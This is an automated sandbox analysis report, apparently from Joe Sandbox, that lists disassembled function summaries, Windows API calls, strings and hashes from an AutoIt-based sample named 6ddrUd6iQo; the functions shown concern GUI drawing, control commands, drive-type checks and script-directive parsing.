Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 17019278A05109EFCB45DF98C5909AEF7B5FB58310F208599DD19E7701D730AE41DB90

Function 018F1E70 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661604968.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 003537F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0035F910), ref: 003538AF
IsWindowVisible.USER32(?), ref: 003538D3

Strings

SETCURRENTSELECTION, xrefs: 00353A3E
FINDSTRING, xrefs: 003539FE
SENDCOMMANDID, xrefs: 00353C62
CURRENTTAB, xrefs: 00353945
TABRIGHT, xrefs: 00353925
ISENABLED, xrefs: 003538F3
ISCHECKED, xrefs: 00353AC1
DELSTRING, xrefs: 003539D1
SELECTSTRING, xrefs: 00353A8E
EDITPASTE, xrefs: 00353BE7
GETCURRENTSELECTION, xrefs: 00353A6B
GETLINECOUNT, xrefs: 00353B4E
SHOWDROPDOWN, xrefs: 00353968
HIDEDROPDOWN, xrefs: 00353988
GETSELECTED, xrefs: 00353B2B
ISVISIBLE, xrefs: 003538BF
GETLINE, xrefs: 00353C23
GETCURRENTLINE, xrefs: 00353B75
CHECK, xrefs: 00353AF5
TABLEFT, xrefs: 0035390F
UNCHECK, xrefs: 00353B0B
GETCURRENTCOL, xrefs: 00353BB0
ADDSTRING, xrefs: 0035399E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: fcc14e1d164f59f3bfb0435848efc14e6ff54ba7d8c140b4310885bcbbc2a7a4
Instruction ID: 0c5c746b4a5fa2b86142c7c40575be6826be6fe5e83c32f099f4e461a0916912
Opcode Fuzzy Hash: fcc14e1d164f59f3bfb0435848efc14e6ff54ba7d8c140b4310885bcbbc2a7a4
Instruction Fuzzy Hash: 09D1803421431A9BCB16EF10C491E6AB7A5EF55385F114869BC865B3B3CB31EE4ECB81

Function 0035A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0035A89F
GetSysColorBrush.USER32(0000000F), ref: 0035A8D0
GetSysColor.USER32(0000000F), ref: 0035A8DC
SetBkColor.GDI32(?,000000FF), ref: 0035A8F6
SelectObject.GDI32(?,?), ref: 0035A905
InflateRect.USER32(?,000000FF,000000FF), ref: 0035A930
GetSysColor.USER32(00000010), ref: 0035A938
CreateSolidBrush.GDI32(00000000), ref: 0035A93F
FrameRect.USER32(?,?,00000000), ref: 0035A94E
DeleteObject.GDI32(00000000), ref: 0035A955
InflateRect.USER32(?,000000FE,000000FE), ref: 0035A9A0
FillRect.USER32(?,?,?), ref: 0035A9D2
GetWindowLongW.USER32(?,000000F0), ref: 0035A9FD

Part of subcall function 0035AB60: GetSysColor.USER32(00000012), ref: 0035AB99
Part of subcall function 0035AB60: SetTextColor.GDI32(?,?), ref: 0035AB9D
Part of subcall function 0035AB60: GetSysColorBrush.USER32(0000000F), ref: 0035ABB3
Part of subcall function 0035AB60: GetSysColor.USER32(0000000F), ref: 0035ABBE
Part of subcall function 0035AB60: GetSysColor.USER32(00000011), ref: 0035ABDB
Part of subcall function 0035AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0035ABE9
Part of subcall function 0035AB60: SelectObject.GDI32(?,00000000), ref: 0035ABFA
Part of subcall function 0035AB60: SetBkColor.GDI32(?,00000000), ref: 0035AC03
Part of subcall function 0035AB60: SelectObject.GDI32(?,?), ref: 0035AC10
Part of subcall function 0035AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0035AC2F
Part of subcall function 0035AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0035AC46
Part of subcall function 0035AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0035AC5B

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 27d39ba95dc7584da0d260a5e5c42417add9f1543daea248236c548f63400f4f
Instruction ID: 56937cb2117103101e77bf6988615b2d590636cc16a1d32c90d25eee15d6f1e1
Opcode Fuzzy Hash: 27d39ba95dc7584da0d260a5e5c42417add9f1543daea248236c548f63400f4f
Instruction Fuzzy Hash: 5EA16A72008705AFD7129F64DC08E6BBBADFB89322F104B29F962961F1D731D944DB52

Function 003477BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 003477F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003478B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003478EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00347900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00347946
GetClientRect.USER32(00000000,?), ref: 00347952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00347996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003479A5
GetStockObject.GDI32(00000011), ref: 003479B5
SelectObject.GDI32(00000000,00000000), ref: 003479B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003479C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 003479D2
DeleteDC.GDI32(00000000), ref: 003479DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00347A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00347A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00347A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00347A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00347A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00347AAE
GetStockObject.GDI32(00000011), ref: 00347AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00347AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00347ACE

Strings

static, xrefs: 00347990, 00347AA8
msctls_progress32, xrefs: 00347A4F
DISPLAY, xrefs: 0034799B
AutoIt v3, xrefs: 0034793E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 30875c9de59ce6ea5d71347d0bcecdd3ea4eddf2e6016848e7be288375703207
Instruction ID: 98cc681537736ee7109a0daf3777658b0a69eaa77fca3430921c40a92369c07e
Opcode Fuzzy Hash: 30875c9de59ce6ea5d71347d0bcecdd3ea4eddf2e6016848e7be288375703207
Instruction Fuzzy Hash: F4A1AFB1A10209BFEB15DBA4DD4AFAE7BBDEB48711F004515FA14AB2E0D770AD00CB60

Function 0033AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0033AF89
GetDriveTypeW.KERNEL32(?,0035FAC0,?,\\.\,0035F910), ref: 0033B066
SetErrorMode.KERNEL32(00000000,0035FAC0,?,\\.\,0035F910), ref: 0033B1C4

Strings

Unknown, xrefs: 0033B086, 0033B12A
FileBackedVirtual, xrefs: 0033B193
iSCSI, xrefs: 0033B169
RAMDisk, xrefs: 0033B090
Fixed, xrefs: 0033B0AE
SSA, xrefs: 0033B14D
1394, xrefs: 0033B146
\\.\, xrefs: 0033AFDB
ATAPI, xrefs: 0033B138
RAID, xrefs: 0033B162
CDROM, xrefs: 0033B09A
SATA, xrefs: 0033B177
Virtual, xrefs: 0033B18C
Removable, xrefs: 0033B0B8
ATA, xrefs: 0033B13F
MMC, xrefs: 0033B185
PhysicalDrive, xrefs: 0033B012
SSD, xrefs: 0033B0F1
SCSI, xrefs: 0033B131
SAS, xrefs: 0033B170
USB, xrefs: 0033B15B
Fibre, xrefs: 0033B154
Network, xrefs: 0033B0A4

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 3a4e625a04d28fc869a43a032496add604b3d70b957c9e37934d5434bd9465bd
Instruction ID: e4ef0c3564cd280eea25edd3027ed3b674bce62675a8e6fecc57096d157ef2c4
Opcode Fuzzy Hash: 3a4e625a04d28fc869a43a032496add604b3d70b957c9e37934d5434bd9465bd
Instruction Fuzzy Hash: 2651B230A84B05ABDB07EB50C9D29BDF3B4AB14741F204057F60BAB690D7B5AD51EB82

Function 002D6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 002D6A91
__wcsnicmp.LIBCMT ref: 002D6AA9
__wcsnicmp.LIBCMT ref: 002D6AC1
__wcsnicmp.LIBCMT ref: 002D6AD9
__wcsnicmp.LIBCMT ref: 002D6AF1
__wcsnicmp.LIBCMT ref: 002D6B09
__wcsnicmp.LIBCMT ref: 002D6B21
__wcsnicmp.LIBCMT ref: 002D6B35
__wcsnicmp.LIBCMT ref: 002D6B76
__wcsnicmp.LIBCMT ref: 002D6B8A
__wcsnicmp.LIBCMT ref: 002D6B9E
__wcsnicmp.LIBCMT ref: 002D6BB2

Strings

#comments-end, xrefs: 002D6B98
#cs, xrefs: 002D6B2F, 002D6B84
#requireadmin, xrefs: 002D6ABB
#include, xrefs: 002D6B03
Unterminated group of comments, xrefs: 0030E82C
Cannot parse #include, xrefs: 0030E819
#notrayicon, xrefs: 002D6AA3
Bad directive syntax error, xrefs: 0030E743
#ce, xrefs: 002D6BAC
#OnAutoItStartRegister, xrefs: 002D6AD3
#comments-start, xrefs: 002D6B1B, 002D6B70
#pragma compile, xrefs: 002D6A8B
#include-once, xrefs: 002D6AEB

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 51a05c18cb601219b378ff79bbeb0a2a132d9a876a0cb296c04a37149455239a
Instruction ID: 8f841bb3c7c03045b99c745ed104837219c1f0659b22c455b1f0a7083419ca06
Opcode Fuzzy Hash: 51a05c18cb601219b378ff79bbeb0a2a132d9a876a0cb296c04a37149455239a
Instruction Fuzzy Hash: 52813B70720655BACB21AF60CC96FBF7758AF14740F044026FD46AA2C2EB70DE65CA51

Function 002D2C18 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 002D2CA2
DeleteObject.GDI32(00000000), ref: 002D2CE8
DeleteObject.GDI32(00000000), ref: 002D2CF3
DestroyCursor.USER32(00000000), ref: 002D2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 002D2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0030C68B
6F570200.COMCTL32(?,000000FF,?), ref: 0030C6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0030CAED

Part of subcall function 002D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002D2036,?,00000000,?,?,?,?,002D16CB,00000000,?), ref: 002D1B9A

SendMessageW.USER32(?,00001053), ref: 0030CB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0030CB41

Strings

0, xrefs: 0030C981

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: DestroyMessageSendWindow$DeleteObject$CursorF570200InvalidateMoveRect
String ID: 0
API String ID: 2008601239-4108050209
Opcode ID: 72ac52c7e1c3cdcb136b29ffd04d4c464be801a702b77036b9aeeca58a8cced3
Instruction ID: b4705f5850627e50a8cffcbc3353bd9e5ffcf7759eb6233ed0238f73ac0e1181
Opcode Fuzzy Hash: 72ac52c7e1c3cdcb136b29ffd04d4c464be801a702b77036b9aeeca58a8cced3
Instruction Fuzzy Hash: 8D12AD30625201EFCB22CF24C894BA9B7E5FF15301F55566AE885DB2A2C731EC56CF91

Function 0035AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0035AB99
SetTextColor.GDI32(?,?), ref: 0035AB9D
GetSysColorBrush.USER32(0000000F), ref: 0035ABB3
GetSysColor.USER32(0000000F), ref: 0035ABBE
CreateSolidBrush.GDI32(?), ref: 0035ABC3
GetSysColor.USER32(00000011), ref: 0035ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0035ABE9
SelectObject.GDI32(?,00000000), ref: 0035ABFA
SetBkColor.GDI32(?,00000000), ref: 0035AC03
SelectObject.GDI32(?,?), ref: 0035AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 0035AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0035AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 0035AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0035ACA7
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0035ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 0035ACEC
DrawFocusRect.USER32(?,?), ref: 0035ACF7
GetSysColor.USER32(00000011), ref: 0035AD05
SetTextColor.GDI32(?,00000000), ref: 0035AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0035AD21
SelectObject.GDI32(?,0035A869), ref: 0035AD38
DeleteObject.GDI32(?), ref: 0035AD43
SelectObject.GDI32(?,?), ref: 0035AD49
DeleteObject.GDI32(?), ref: 0035AD4E
SetTextColor.GDI32(?,?), ref: 0035AD54
SetBkColor.GDI32(?,?), ref: 0035AD5E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: bcc62e3f66599409ee378315229a56cac5eed36d61627972cfb4a03c9eb174b4
Instruction ID: 895882d45c47e419c726662fcde48b3cff2804613d26372c0f11347fa369d56a
Opcode Fuzzy Hash: bcc62e3f66599409ee378315229a56cac5eed36d61627972cfb4a03c9eb174b4
Instruction Fuzzy Hash: D1615E71900618EFDF129FA4DC48EAE7BB9EB08322F114625F915AB2B1D6719E40DF90

Function 00358C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00358D34
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00358D45
CharNextW.USER32(0000014E), ref: 00358D74
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00358DB5
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00358DCB
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00358DDC
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00358DF9
SetWindowTextW.USER32(?,0000014E), ref: 00358E45
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00358E5B
SendMessageW.USER32(?,00001002,00000000,?), ref: 00358E8C
_memset.LIBCMT ref: 00358EB1
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00358EFA
_memset.LIBCMT ref: 00358F59
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00358F83
SendMessageW.USER32(?,00001074,?,00000001), ref: 00358FDB
SendMessageW.USER32(?,0000133D,?,?), ref: 00359088
InvalidateRect.USER32(?,00000000,00000001), ref: 003590AA
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003590F4
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00359121
DrawMenuBar.USER32(?), ref: 00359130
SetWindowTextW.USER32(?,0000014E), ref: 00359158

Strings

0, xrefs: 003590C2

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: f7c9854e27829c3de7c840fc1d3e7a97f15f96117992e667d4c9415196ca5420
Instruction ID: 1ba7a01d6899023af62d6b2e0fa404828c2b7bd5f53d268521356914ebbee701
Opcode Fuzzy Hash: f7c9854e27829c3de7c840fc1d3e7a97f15f96117992e667d4c9415196ca5420
Instruction Fuzzy Hash: 24E18070901219EFDF229F50CC84EEE7BB9EF05751F10815AFD15AA2A1DB708A89DF60

Function 00354B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00354C51
GetDesktopWindow.USER32 ref: 00354C66
GetWindowRect.USER32(00000000), ref: 00354C6D
GetWindowLongW.USER32(?,000000F0), ref: 00354CCF
DestroyWindow.USER32(?), ref: 00354CFB
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00354D24
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00354D42
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00354D68
SendMessageW.USER32(?,00000421,?,?), ref: 00354D7D
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00354D90
IsWindowVisible.USER32(?), ref: 00354DB0
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00354DCB
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00354DDF
GetWindowRect.USER32(?,?), ref: 00354DF7
MonitorFromPoint.USER32(?,?,00000002), ref: 00354E1D
GetMonitorInfoW.USER32(00000000,?), ref: 00354E37
CopyRect.USER32(?,?), ref: 00354E4E
SendMessageW.USER32(?,00000412,00000000), ref: 00354EB9

Strings

tooltips_class32, xrefs: 00354D1D
(, xrefs: 00354E2A
0, xrefs: 00354BFC

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 01e1127bde092d3a32249195ccc1d9b06e29e7aa218cc2d3864b1eb184fa6bb2
Instruction ID: bf2d60875fe29c60402c8621bc52f2249b7372af6e09deb688b9cfc0b27e292f
Opcode Fuzzy Hash: 01e1127bde092d3a32249195ccc1d9b06e29e7aa218cc2d3864b1eb184fa6bb2
Instruction Fuzzy Hash: B2B17C71618340AFDB09DF24C945F6ABBE4BF88315F00891DF9999B2A1D771EC88CB91

Function 002D27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002D28BC
GetSystemMetrics.USER32(00000007), ref: 002D28C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002D28EF
GetSystemMetrics.USER32(00000008), ref: 002D28F7
GetSystemMetrics.USER32(00000004), ref: 002D291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002D2939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002D2949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002D297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002D2990
GetClientRect.USER32(00000000,000000FF), ref: 002D29AE
GetStockObject.GDI32(00000011), ref: 002D29CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 002D29D5

Part of subcall function 002D2344: GetCursorPos.USER32(?), ref: 002D2357
Part of subcall function 002D2344: ScreenToClient.USER32(003967B0,?), ref: 002D2374
